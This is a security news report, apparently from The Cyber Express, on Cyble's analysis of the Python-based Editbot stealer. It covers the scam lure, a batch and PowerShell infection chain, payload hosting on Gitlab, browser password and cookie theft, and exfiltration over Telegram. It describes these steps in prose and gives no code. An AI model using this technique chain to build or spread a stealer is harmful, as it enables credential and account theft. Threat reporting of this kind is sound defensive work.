A new menace has emerged on the dark web— the Editbot stealer. Recently discovered by Cyble Research and Intelligence Labs (CRIL), this Python-based information stealer poses a significant risk to social media users’ sensitive data.
Initially detected in a WinRAR archive file on VirusTotal, the Editbot stealer exhibited minimal detection rates, prompting further analysis by CRIL.
What unfolded was a meticulously designed multi-stage attack aimed at evading detection, downloading additional payloads, and establishing persistence on the victim’s system.
Editbot Stealer: The New Information Stealer on the Dark Web
The campaign orchestrated by Threat Actors (TAs) involves leveraging open-source code-sharing platforms like Gitlab to fetch subsequent stage payloads. The downloaded payload, a Python-based stealer, is adept at pilfering critical information such as passwords, cookies, and web data. To complete its malicious agenda, the Editbot stealer utilizes a Telegram channel to transmit the stolen data back to the TAs.
Cyble Research and Intelligence Labs (CRIL) investigation on December 5th uncovered a potentially malicious RAR file on VirusTotal, leading to a swift examination as similar files surfaced within a short timeframe. The identified archive file is linked to a deceptive social media scam targeting users with the premise of a ‘defective product to be sent back.’ TAs exploit the appeal of popular products to lure users into interacting with deceptive pages, expanding their reach through user engagement.
The Editbot stealer employs a multi-stage infection strategy, utilizing a first-stage malicious batch file named “Screenshot Product Photo Sample.bat” and a JSON file named “manifest.json.” Through PowerShell commands, the TAs ensure persistence by downloading and executing the Python-based stealer at every login session.
The Features and Capabilities of Editbot Stealer
The technical analysis of the Editbot stealer reveals a highly sophisticated piece of malware. The Python script “libb1.py” enumerates running processes, extracts sensitive information from various web browsers, and transmits the data to a specified Telegram channel.
Upon execution, the stealer captures running processes and extracts sensitive information from browsers such as Chrome, Firefox, Edge, Opera, Brave-Browser, CocCoc, and Chromium. It meticulously retrieves files like Cookies, Login Data, Web Data, and Local State, saving them in a designated directory within the %temp% folder.
The Editbot stealer goes further by decrypting passwords and saving login details, URLs, and decrypted passwords in a text file named “pass.txt.” It also delves into the SQLite database file “Cookies,” extracting cookie information and storing details in “cookie.txt” if associated with a social media site.
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.